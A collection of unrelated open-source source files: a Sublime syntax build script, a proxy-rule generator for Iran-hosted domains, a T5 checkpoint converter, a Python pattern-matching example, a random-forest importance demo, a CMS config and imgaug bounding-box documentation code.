test_directory = package_path / 'tests'
rmtree(str(test_directory), ignore_errors=True)
test_directory.mkdir()
print("Building syntax…")
sublime.active_window().run_command('build_js_custom_syntax', {
'name': 'Babel',
'configuration': BABEL_CONFIGURATION,
'destination_path': str(syntax_path.file_path()),
})
ResourcePath('Packages/JSCustom/styled_components/Styled Components.sublime-syntax').copy(
(ResourcePath.from_file_path(package_path) / 'Styled Components.sublime-syntax').file_path()
)
print("Building tests…")
sublime.run_command('build_js_custom_tests', {
'syntax_path': str(syntax_path),
'suites': ['js', 'flow', 'jsx', 'string_object_keys'],
'destination_directory': str(test_directory),
})
print('Done.')
|
src/create_config.py | SamadiPour/iran-hosted-domains | 173 | 12691341 | <filename>src/create_config.py<gh_stars>100-1000
import json
from typing import Iterable
import constants as consts
import utils
def shadowrocket(domains: Iterable[str]):
config = (
"#Shadowrocket\n"
"[General]\n"
"bypass-system = true\n"
"skip-proxy = 192.168.0.0/16, 10.0.0.0/8, 172.16.0.0/12, localhost, *.local, captive.apple.com\n"
"tun-excluded-routes = 10.0.0.0/8, 172.16.31.10/10, 127.0.0.0/8, 169.254.0.0/16, 172.16.0.0/12, 192.0.0.0/24, 192.0.2.0/24, 172.16.31.10/24, 192.168.0.0/16, 198.18.0.0/15, 198.51.100.0/24, 203.0.113.0/24, 172.16.17.32/4, 255.255.255.255/32\n"
"dns-server = system\n"
"ipv6 = true\n"
"[Rule]\n"
)
config += "".join(f"DOMAIN-SUFFIX,{domain},DIRECT\n" for domain in domains)
config += (
"USER-AGENT,Line*,PROXY\n"
"IP-CIDR,192.168.0.0/16,DIRECT\n"
"IP-CIDR,10.0.0.0/8,DIRECT\n"
"IP-CIDR,172.16.0.0/12,DIRECT\n"
"IP-CIDR,127.0.0.0/8,DIRECT\n"
"GEOIP,IR,DIRECT\n"
"FINAL,PROXY\n"
"[Host]\n"
"localhost = 127.0.0.1\n"
)
utils.save_to_file(consts.shadowrocket_path, config)
def qv2ray(direct_domains: Iterable[str], proxied_domains: Iterable[str], ads_domains: Iterable[str]):
schema = {
"description": "Iran hosted domains",
"domainStrategy": "AsIs",
"domains": {
"direct": ["regexp:^.+\\.ir$"] + list(direct_domains),
"proxy": list(proxied_domains),
"block": ["geosite:category-ads-all"] + list(ads_domains),
},
"ips": {"direct": ["geoip:ir"]},
"name": "ir_hosted",
}
utils.save_to_file(consts.qv2ray_schema_path, json.dumps(schema))
def clash(domains: Iterable[str]):
config = (
"# Clash\n"
"# Wiki: https://github.com/Dreamacro/clash/wiki/premium-core-features#rule-providers\n"
"payload:\n"
)
config += "".join(f" - DOMAIN-SUFFIX,{domain}\n" for domain in domains)
config += (
# " - IP-CIDR,192.168.0.0/16\n"
# " - IP-CIDR,10.0.0.0/8\n"
# " - IP-CIDR,172.16.0.0/12\n"
# " - IP-CIDR,127.0.0.0/8\n"
" - GEOIP,IR\n"
)
utils.save_to_file(consts.clash_path, config)
def switchy_omega(others: Iterable[str]):
config = "127.0.0.1\n" "::1\n" "localhost\n" "*.ir\n"
config += "".join(f"*{domain}\n" for domain in others)
utils.save_to_file(consts.switchy_omega_path, config)
|
odin/utilities/__init__.py | gsamarakoon/Odin | 103 | 12691343 | from .odin_init import odin_init
from .compute_days_elapsed import compute_days_elapsed
from .fund_actions import period_dict
|
03-dict-set/py3.10/creator.py | SeirousLee/example-code-2e | 990 | 12691354 | """
Pattern matching with mapping—requires Python ≥ 3.10
# tag::DICT_MATCH_TEST[]
>>> b1 = dict(api=1, author='<NAME>',
... type='book', title='Gödel, Escher, Bach')
>>> get_creators(b1)
['<NAME>']
>>> from collections import OrderedDict
>>> b2 = OrderedDict(api=2, type='book',
... title='Python in a Nutshell',
... authors='<NAME>'.split())
>>> get_creators(b2)
['Martelli', 'Ravenscroft', 'Holden']
>>> get_creators({'type': 'book', 'pages': 770})
Traceback (most recent call last):
...
ValueError: Invalid 'book' record: {'type': 'book', 'pages': 770}
>>> get_creators('Spam, spam, spam')
Traceback (most recent call last):
...
ValueError: Invalid record: 'Spam, spam, spam'
# end::DICT_MATCH_TEST[]
"""
# tag::DICT_MATCH[]
def get_creators(record: dict) -> list:
match record:
case {'type': 'book', 'api': 2, 'authors': [*names]}: # <1>
return names
case {'type': 'book', 'api': 1, 'author': name}: # <2>
return [name]
case {'type': 'book'}: # <3>
raise ValueError(f"Invalid 'book' record: {record!r}")
case {'type': 'movie', 'director': name}: # <4>
return [name]
case _: # <5>
raise ValueError(f'Invalid record: {record!r}')
# end::DICT_MATCH[]
|
src/tf_transformers/models/t5/convert.py | legacyai/tf-transformers | 116 | 12691367 | import numpy as np
import tensorflow as tf
from absl import logging
from tf_transformers.core import keras_utils
def convert_t5_pt(model, config, model_name):
"""PT converter
Args:
model_hf: HuggingFace Model (TF)
model: tf_transformers model/layer
config: dict
Returns:
a function
"""
# When dropout, use_auto_regressive is enabled assertion won't work
SKIP_ASSERT = False
try:
# LegacyLayer
local_config = model._config_dict['decoder']
except Exception as e:
# LegacyModel
local_config = model.model_config['decoder']
if local_config['use_dropout']:
logging.warn("Note: As `use_dropout` is True we will skip Assertions, please verify the model.")
SKIP_ASSERT = True
if local_config['use_auto_regressive']:
raise ValueError(
"Please save model checkpoint without `use_auto_regressive` and then reload it with `use_auto_regressive`."
)
SKIP_ASSERT = True
import torch
import transformers
transformers.logging.set_verbosity_error()
from_model_vars = [
"encoder.block.{}.layer.0.SelfAttention.q.weight",
"encoder.block.{}.layer.0.SelfAttention.k.weight",
"encoder.block.{}.layer.0.SelfAttention.v.weight",
"encoder.block.{}.layer.0.SelfAttention.o.weight",
"encoder.block.{}.layer.0.layer_norm.weight",
"encoder.block.{}.layer.1.DenseReluDense.wi.weight",
"encoder.block.{}.layer.1.DenseReluDense.wo.weight",
"encoder.block.{}.layer.1.layer_norm.weight",
]
to_model_vars = [
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/query/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/key/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/value/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention_output/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/pre_attention_norm/weight:0",
"tf_transformers/t5_encoder/transformer/layer_{}/intermediate/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/output/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention_layer_norm/weight:0",
]
# Simple Assertion
assert len(from_model_vars) == len(to_model_vars)
mapping_dict = {}
for index in range(len(from_model_vars)):
for i in range(config["num_hidden_layers"]):
mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)
# Only Layer 0
mapping_dict[
"encoder.block.0.layer.0.SelfAttention.relative_attention_bias.weight"
] = "tf_transformers/t5_encoder/transformer/layer_0/self_attention/relative_attention_bias/embeddings:0"
# Word Embedding
mapping_dict["shared.weight"] = "tf_transformers/t5_encoder/word_embeddings/embeddings:0"
# Final Layer Norm weight
mapping_dict["encoder.final_layer_norm.weight"] = "tf_transformers/t5_encoder/last_layer_norm/weight:0"
# T5Model
from transformers import T5Model as PTT5Model
model_hf = PTT5Model.from_pretrained(model_name)
# HF model variable name to variable values, for fast retrieval
from_to_variable_dict = {name: var.detach().numpy() for name, var in model_hf.named_parameters()}
tf_transformers_model_index_dict = {}
for index, var in enumerate(model.variables):
tf_transformers_model_index_dict[var.name] = index
# legacy_ai <-- hub
assigned_map = []
# assigned_map_values = []
for original_var, legacy_var in mapping_dict.items():
index = tf_transformers_model_index_dict[legacy_var]
# If not in mapping_dict, then mostly it is from attention layer
if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
# hub (2D) to tf_transformers (3D)
model.variables[index].assign(
np.reshape(
np.transpose(from_to_variable_dict.get(original_var)),
(
config["embedding_size"],
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
continue
elif "kernel:0" in legacy_var:
if list(model.variables[index].shape) == list(from_to_variable_dict.get(original_var).shape):
model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
assigned_map.append((original_var, legacy_var))
continue
else:
model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
assigned_map.append((original_var, legacy_var))
continue
model.variables[index].assign(from_to_variable_dict.get(original_var))
assigned_map.append((original_var, legacy_var))
# Decoder Side
# From vars (Transformer variables)
from_model_vars = [
"decoder.block.{}.layer.0.SelfAttention.q.weight",
"decoder.block.{}.layer.0.SelfAttention.k.weight",
"decoder.block.{}.layer.0.SelfAttention.v.weight",
"decoder.block.{}.layer.0.SelfAttention.o.weight",
"decoder.block.{}.layer.0.layer_norm.weight",
"decoder.block.{}.layer.1.EncDecAttention.q.weight",
"decoder.block.{}.layer.1.EncDecAttention.k.weight",
"decoder.block.{}.layer.1.EncDecAttention.v.weight",
"decoder.block.{}.layer.1.EncDecAttention.o.weight",
"decoder.block.{}.layer.1.layer_norm.weight",
"decoder.block.{}.layer.2.DenseReluDense.wi.weight",
"decoder.block.{}.layer.2.DenseReluDense.wo.weight",
"decoder.block.{}.layer.2.layer_norm.weight",
]
to_model_vars = [
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/query/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/key/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/value/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention_output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/pre_attention_norm/weight:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/query/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/key/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/value/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention_output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/pre_cross_attention_norm/weight:0",
"tf_transformers/t5_decoder/transformer/layer_{}/intermediate/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention_layer_norm/weight:0",
]
# Simple Assertion
assert len(from_model_vars) == len(to_model_vars)
mapping_dict = {}
for index in range(len(from_model_vars)):
for i in range(config["num_hidden_layers"]):
mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)
# Only Layer 0
mapping_dict[
"decoder.block.0.layer.0.SelfAttention.relative_attention_bias.weight"
] = "tf_transformers/t5_decoder/transformer/layer_0/self_attention/relative_attention_bias/embeddings:0"
# Final Layer Norm weight
mapping_dict["decoder.final_layer_norm.weight"] = "tf_transformers/t5_decoder/last_layer_norm/weight:0"
# HF model variable name to variable values, for fast retrieval
from_to_variable_dict = {name: var.detach().numpy() for name, var in model_hf.named_parameters()}
tf_transformers_model_index_dict = {}
for index, var in enumerate(model.variables):
tf_transformers_model_index_dict[var.name] = index
if (
var.name
== "tf_transformers/t5_decoder/transformer/layer_0/cross_attention/relative_attention_bias/embeddings:0"
):
model.variables[index].assign(tf.zeros_like(model.variables[index]))
continue
# legacy_ai <-- hub
assigned_map = []
# assigned_map_values = []
for original_var, legacy_var in mapping_dict.items():
index = tf_transformers_model_index_dict[legacy_var]
# If not in mapping_dict, then mostly it is from attention layer
if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
# hub (2D) to tf_transformers (3D)
model.variables[index].assign(
np.reshape(
np.transpose(from_to_variable_dict.get(original_var)),
(
config["embedding_size"],
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
continue
elif "kernel:0" in legacy_var:
if list(model.variables[index].shape) == list(from_to_variable_dict.get(original_var).shape):
model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
assigned_map.append((original_var, legacy_var))
continue
else:
model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
assigned_map.append((original_var, legacy_var))
continue
model.variables[index].assign(from_to_variable_dict.get(original_var))
assigned_map.append((original_var, legacy_var))
if SKIP_ASSERT is False:
from transformers import T5Tokenizer
tokenizer = T5Tokenizer.from_pretrained(model_name)
text = "This is a long sentence to check how close models are."
inputs = tokenizer(text, return_tensors="pt")
outputs_hf = model_hf(inputs["input_ids"], decoder_input_ids=inputs["input_ids"])
outputs_hf = torch.sum(outputs_hf["last_hidden_state"], dim=-1).detach().numpy()
inputs = tokenizer(text, return_tensors="tf")
inputs_tf = {}
inputs_tf["encoder_input_ids"] = inputs["input_ids"]
inputs_tf["encoder_input_mask"] = inputs["attention_mask"]
inputs_tf["decoder_input_ids"] = inputs["input_ids"]
outputs_tf = model(inputs_tf)
outputs_tf = tf.reduce_sum(outputs_tf["token_embeddings"], axis=-1).numpy()
tf.debugging.assert_near(outputs_hf, outputs_tf, rtol=1.0)
def convert_t5_tf(model, config, model_name):
"""TF converter
Args:
model_hf: HuggingFace Model (TF)
model: tf_transformers model/layer
config: dict
Returns:
a function
"""
# When dropout, use_auto_regressive is enabled assertion won't work
SKIP_ASSERT = False
try:
# LegacyLayer
local_config = model._config_dict['decoder']
except Exception as e:
# LegacyModel
local_config = model.model_config['decoder']
if local_config['use_dropout']:
logging.warn("Note: As `use_dropout` is True we will skip Assertions, please verify the model.")
SKIP_ASSERT = True
if local_config['use_auto_regressive']:
raise ValueError(
"Please save model checkpoint without `use_auto_regressive` and then reload it with `use_auto_regressive`."
)
SKIP_ASSERT = True
import transformers
transformers.logging.set_verbosity_error()
from_model_vars = [
"tf_t5model/encoder/block_._{}/layer_._0/SelfAttention/q/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._0/SelfAttention/k/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._0/SelfAttention/v/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._0/SelfAttention/o/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._0/layer_norm/weight:0",
"tf_t5model/encoder/block_._{}/layer_._1/DenseReluDense/wi/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._1/DenseReluDense/wo/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._1/layer_norm/weight:0",
]
to_model_vars = [
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/query/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/key/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/value/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention_output/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/pre_attention_norm/weight:0",
"tf_transformers/t5_encoder/transformer/layer_{}/intermediate/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/output/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention_layer_norm/weight:0",
]
# Simple Assertion
assert len(from_model_vars) == len(to_model_vars)
mapping_dict = {}
for index in range(len(from_model_vars)):
for i in range(config["num_hidden_layers"]):
mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)
# Only Layer 0
mapping_dict[
"tf_t5model/encoder/block_._0/layer_._0/SelfAttention/relative_attention_bias/embeddings:0"
] = "tf_transformers/t5_encoder/transformer/layer_0/self_attention/relative_attention_bias/embeddings:0"
# Word Embedding
mapping_dict["shared/shared/weight:0"] = "tf_transformers/t5_encoder/word_embeddings/embeddings:0"
# Final Layer Norm weight
mapping_dict["tf_t5model/encoder/final_layer_norm/weight:0"] = "tf_transformers/t5_encoder/last_layer_norm/weight:0"
# T5Model
from transformers import TFT5Model
model_hf = TFT5Model.from_pretrained(model_name)
from_to_variable_dict = {var.name: var for var in model_hf.variables}
tf_transformers_model_index_dict = {}
for index, var in enumerate(model.variables):
tf_transformers_model_index_dict[var.name] = index
# legacy_ai <-- hub
assigned_map = []
# assigned_map_values = []
for original_var, legacy_var in mapping_dict.items():
index = tf_transformers_model_index_dict[legacy_var]
# If not in mapping_dict, then mostly it is from attention layer
if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
# hub (2D) to tf_transformers (3D)
model.variables[index].assign(
tf.reshape(
from_to_variable_dict.get(original_var),
(
config["embedding_size"],
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
continue
model.variables[index].assign(from_to_variable_dict.get(original_var))
assigned_map.append((original_var, legacy_var))
# Decoder Side
# From vars (Transformer variables)
from_model_vars = [
"tf_t5model/decoder/block_._{}/layer_._0/SelfAttention/q/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._0/SelfAttention/k/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._0/SelfAttention/v/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._0/SelfAttention/o/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._0/layer_norm/weight:0",
"tf_t5model/decoder/block_._{}/layer_._1/EncDecAttention/q/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._1/EncDecAttention/k/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._1/EncDecAttention/v/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._1/EncDecAttention/o/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._1/layer_norm/weight:0",
"tf_t5model/decoder/block_._{}/layer_._2/DenseReluDense/wi/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._2/DenseReluDense/wo/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._2/layer_norm/weight:0",
]
to_model_vars = [
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/query/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/key/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/value/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention_output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/pre_attention_norm/weight:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/query/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/key/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/value/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention_output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/pre_cross_attention_norm/weight:0",
"tf_transformers/t5_decoder/transformer/layer_{}/intermediate/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention_layer_norm/weight:0",
]
# Simple Assertion
assert len(from_model_vars) == len(to_model_vars)
mapping_dict = {}
for index in range(len(from_model_vars)):
for i in range(config["num_hidden_layers"]):
mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)
# Only Layer 0
mapping_dict[
"tf_t5model/decoder/block_._0/layer_._0/SelfAttention/relative_attention_bias/embeddings:0"
] = "tf_transformers/t5_decoder/transformer/layer_0/self_attention/relative_attention_bias/embeddings:0"
mapping_dict[
"tf_t5model/decoder/block_._0/layer_._1/EncDecAttention/relative_attention_bias/embeddings:0"
] = "tf_transformers/t5_decoder/transformer/layer_0/cross_attention/relative_attention_bias/embeddings:0"
# Final Layer Norm weight
mapping_dict["tf_t5model/decoder/final_layer_norm/weight:0"] = "tf_transformers/t5_decoder/last_layer_norm/weight:0"
from_to_variable_dict = {var.name: var for var in model_hf.variables}
tf_transformers_model_index_dict = {}
for index, var in enumerate(model.variables):
tf_transformers_model_index_dict[var.name] = index
# legacy_ai <-- hub
assigned_map = []
# assigned_map_values = []
for original_var, legacy_var in mapping_dict.items():
index = tf_transformers_model_index_dict[legacy_var]
# If not in mapping_dict, then mostly it is from attention layer
if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
# hub (2D) to tf_transformers (3D)
model.variables[index].assign(
tf.reshape(
from_to_variable_dict.get(original_var),
(
config["embedding_size"],
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
continue
if (
original_var
== "tf_t5model/decoder/block_._0/layer_._1/EncDecAttention/relative_attention_bias/embeddings:0"
):
if original_var not in from_to_variable_dict:
model.variables[index].assign(tf.zeros_like(model.variables[index]))
assigned_map.append((original_var, legacy_var))
continue
model.variables[index].assign(from_to_variable_dict.get(original_var))
assigned_map.append((original_var, legacy_var))
if SKIP_ASSERT is False:
from transformers import T5Tokenizer
tokenizer = T5Tokenizer.from_pretrained(model_name)
text = "This is a long sentence to check how close models are."
inputs = tokenizer(text, return_tensors="tf")
outputs_hf = model_hf(inputs["input_ids"], decoder_input_ids=inputs["input_ids"])
outputs_hf = tf.reduce_sum(outputs_hf["last_hidden_state"], axis=-1).numpy()
inputs_tf = {}
inputs_tf["encoder_input_ids"] = inputs["input_ids"]
inputs_tf["encoder_input_mask"] = inputs["attention_mask"]
inputs_tf["decoder_input_ids"] = inputs["input_ids"]
outputs_tf = model(inputs_tf)
outputs_tf = tf.reduce_sum(outputs_tf["token_embeddings"], axis=-1).numpy()
if keras_utils.get_policy_name() == 'float32':
tf.debugging.assert_near(outputs_hf, outputs_tf, rtol=1.0)
|
test/__init__.py | cmutel/json2html | 236 | 12691370 | '''
Unit Test Cases for JSON2HTML
Description - python wrapper for converting JSON to HTML Table format
(c) 2013 <NAME>. MIT License
'''
__author__ = '<NAME>'
__version__ = '1.1.1'
__license__ = 'MIT'
|
scripts/demo.py | mathkann/understanding-random-forests | 353 | 12691374 | """
Understanding variable importances in forests of randomized trees.
<NAME>, <NAME>, <NAME> and <NAME>
NIPS, Lake Tahoe, United States, 2013
http://orbi.ulg.ac.be/handle/2268/155642
This demo reproduces Table 2 from the paper. It also shows that using Extra-
Trees from Scikit-Learn, or an ensemble of randomized ID3 trees (see ID3.py)
give identical results.
Figure 2 from the paper can be obtained using the 2d array importances values
yielded by a `RandomizedID3Ensemble` (see the commented code at the bottom).
Author: <NAME> <<EMAIL>>
License: BSD 3 clause
"""
import itertools
import numpy as np
from sklearn.utils import check_random_state
# Datasets ====================================================================
def make_led(irrelevant=0):
"""Generate exhaustively all samples from the 7-segment problem.
Parameters
----------
irrelevant : int, optional (default=0)
The number of irrelevant binary features to add. Since samples are
generated exhaustively, this makes the size of the resulting dataset
2^(irrelevant) times larger.
Returns
-------
X, y
"""
data = np.array([[0, 0, 1, 0, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 1, 2],
[1, 0, 1, 1, 0, 1, 1, 3],
[0, 1, 1, 1, 0, 1, 0, 4],
[1, 1, 0, 1, 0, 1, 1, 5],
[1, 1, 0, 1, 1, 1, 1, 6],
[1, 0, 1, 0, 0, 1, 0, 7],
[1, 1, 1, 1, 1, 1, 1, 8],
[1, 1, 1, 1, 0, 1, 1, 9],
[1, 1, 1, 0, 1, 1, 1, 0]])
X, y = np.array(data[:, :7], dtype=np.bool), data[:, 7]
if irrelevant > 0:
X_ = []
y_ = []
for i in xrange(10):
for s in itertools.product(range(2), repeat=irrelevant):
X_.append(np.concatenate((X[i], s)))
y_.append(i)
X = np.array(X_, dtype=np.bool)
y = np.array(y_)
return X, y
def make_led_sample(n_samples=200, irrelevant=0, random_state=None):
"""Generate random samples from the 7-segment problem.
Parameters
----------
n_samples : int, optional (default=200)
The number of samples to generate.
irrelevant : int, optional (default=0)
The number of irrelevant binary features to add.
Returns
-------
X, y
"""
random_state = check_random_state(random_state)
data = np.array([[0, 0, 1, 0, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 1, 2],
[1, 0, 1, 1, 0, 1, 1, 3],
[0, 1, 1, 1, 0, 1, 0, 4],
[1, 1, 0, 1, 0, 1, 1, 5],
[1, 1, 0, 1, 1, 1, 1, 6],
[1, 0, 1, 0, 0, 1, 0, 7],
[1, 1, 1, 1, 1, 1, 1, 8],
[1, 1, 1, 1, 0, 1, 1, 9],
[1, 1, 1, 0, 1, 1, 1, 0]])
data = data[random_state.randint(0, 10, n_samples)]
X, y = np.array(data[:, :7], dtype=np.bool), data[:, 7]
if irrelevant > 0:
X = np.hstack((X, random_state.rand(n_samples, irrelevant) > 0.5))
return X, y
# Formulae ====================================================================
from gmpy import comb
def binomial(k, n):
"""Return the number of combinations of k elements among a collection of
size n."""
if k < 0:
return 0
elif k > n:
return 0
else:
return comb(int(n), int(k))
def entropy(X):
"""Return the entropy (in base 2) of a discrete variable X, encoded as a
1d array."""
e = 0.
n_samples = len(X)
for count in np.bincount(X):
p = 1. * count / n_samples
if p > 0:
e -= p * np.log2(p)
return e
def mdi_importance(X_m, X, y):
"""The MDI importance of X_m for Y, as computed with an infinite ensemble
of fully developed totally randomized trees.
This is a direct implementation of Equation 3 from the paper.
Parameters
----------
X_m : int
The variable for which the importance is computed. It corresponds
to the column in X (from 0 to p-1).
X : array of shape (N, p)
The input data (X_0, X_1, ... X_{p-1}). X should be large enough
to accurately represent the actual data distribution.
y : array of shape (N,)
The Y variable.
Returns
-------
imp : array of size (p,)
The decomposition of the importance of X_m along its degree of
interaction with the other input variables, i.e the p outter terms
in Equation 3. The actual importance Imp(X_m) amounts np.sum(imp).
"""
n_samples, p = X.shape
variables = range(p)
variables.pop(X_m)
imp = np.zeros(p)
values = []
for i in xrange(p):
values.append(np.unique(X[:, i]))
for k in xrange(p):
# Weight of each B of size k
coef = 1. / (binomial(k, p) * (p - k))
# For all B of size k
for B in itertools.combinations(variables, k):
# For all values B=b
for b in itertools.product(*[values[B[j]] for j in xrange(k)]):
mask_b = np.ones(n_samples, dtype=np.bool)
for j in xrange(k):
mask_b &= X[:, B[j]] == b[j]
X_, y_ = X[mask_b, :], y[mask_b]
n_samples_b = len(X_)
if n_samples_b > 0:
children = []
for xi in values[X_m]:
mask_xi = X_[:, X_m] == xi
children.append(y_[mask_xi])
imp[k] += (coef
* (1. * n_samples_b / n_samples) # P(B=b)
* (entropy(y_) -
sum([entropy(c) * len(c) / n_samples_b
for c in children])))
return imp
# Demo ========================================================================
if __name__ == "__main__":
# Generate data
n_trees = 5000
X, y = make_led()
p = X.shape[1]
results = np.empty((p, p + 1))
# Theoretical values
for i in range(p):
results[i, 0] = sum(mdi_importance(i, X, y))
# Empirical results
for i in range(p):
# Using scikit-learn
from sklearn.ensemble import ExtraTreesClassifier
clf = ExtraTreesClassifier(n_estimators=n_trees,
max_features=i + 1,
criterion="entropy",
n_jobs=-1).fit(X, y)
# Note: Variable importances in Scikit-Learn are normalized by
# default. Use normalize=False to disable normalization.
results[:, i + 1] = sum(tree.tree_.compute_feature_importances(normalize=False)
for tree in clf.estimators_) / clf.n_estimators
# # Using a simplistic (but slower) randomized ID3 tree classifier
# from ID3 import RandomizedID3Classifier, RandomizedID3Ensemble
# clf = RandomizedID3Ensemble(n_estimators=n_trees,
# base_estimator=RandomizedID3Classifier(k=i + 1)).fit(X, y)
# # Note: Here clf.feature_importances is a 2d array of shape (p, p).
# # In particular, it could be used to regenerate Figure 2 from
# # the paper.
# results[:, i + 1] = np.sum(clf.feature_importances_, axis=1)
# Print results
print "Table 2:"
print "Variable importances as computed with an ensemble of randomized " \
"trees, for increasing values of $K$. Importances at $K=1$ follow " \
"their theoretical values, as predicted by Equation 3 in Theorem 1. " \
"However, as $K$ increases, importances diverge due to masking " \
"effects. In accordance with Theorem 2, their sum is also always " \
"equal to $I(X_{1}, ..., X_{7}; Y) = H(Y) = log2(10)= 3.321$ " \
"since inputs allow to perfectly predict the output."
print
print "\tEqn.3",
for m in range(p):
print "\tK=%d" % (m + 1),
print
for m in range(p):
print "X_%d" % (m + 1),
for j in range(p + 1):
print "\t%.4f" % results[m, j],
print
print "Sum",
for j in range(p + 1):
print "\t%.4f" % sum(results[:, j]),
|
CalibMuon/Configuration/python/CSC_FakeDBConditions_cff.py | ckamtsikis/cmssw | 852 | 12691390 | <filename>CalibMuon/Configuration/python/CSC_FakeDBConditions_cff.py
import FWCore.ParameterSet.Config as cms
from CalibMuon.CSCCalibration.CSCFakeDBGains_cfi import *
from CalibMuon.CSCCalibration.CSCFakeDBPedestals_cfi import *
from CalibMuon.CSCCalibration.CSCFakeDBNoiseMatrix_cfi import *
from CalibMuon.CSCCalibration.CSCFakeDBCrosstalk_cfi import *
from CalibMuon.CSCCalibration.CSC_BadChambers_cfi import *
|
scripts/generate_rtd_images/gen_bounding_boxes.py | marsbroshok/imgaug-doc | 134 | 12691398 | <reponame>marsbroshok/imgaug-doc<filename>scripts/generate_rtd_images/gen_bounding_boxes.py
from __future__ import print_function, division
from .utils import save, grid
def main():
"""Generate all example images for the chapter `Examples: Bounding Boxes`
in the documentation."""
chapter_examples_bounding_boxes_simple()
chapter_examples_bounding_boxes_rotation()
chapter_examples_bounding_boxes_ooi()
chapter_examples_bounding_boxes_shift()
chapter_examples_bounding_boxes_projection()
chapter_examples_bounding_boxes_iou()
def chapter_examples_bounding_boxes_simple():
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug.augmentables.bbs import BoundingBox, BoundingBoxesOnImage
ia.seed(1)
image = ia.quokka(size=(256, 256))
bbs = BoundingBoxesOnImage([
BoundingBox(x1=65, y1=100, x2=200, y2=150),
BoundingBox(x1=150, y1=80, x2=200, y2=130)
], shape=image.shape)
seq = iaa.Sequential([
iaa.Multiply((1.2, 1.5)), # change brightness, doesn't affect BBs
iaa.Affine(
translate_px={"x": 40, "y": 60},
scale=(0.5, 0.7)
) # translate by 40/60px on x/y axis, and scale to 50-70%, affects BBs
])
# Augment BBs and images.
image_aug, bbs_aug = seq(image=image, bounding_boxes=bbs)
# print coordinates before/after augmentation (see below)
# use .x1_int, .y_int, ... to get integer coordinates
for i in range(len(bbs.bounding_boxes)):
before = bbs.bounding_boxes[i]
after = bbs_aug.bounding_boxes[i]
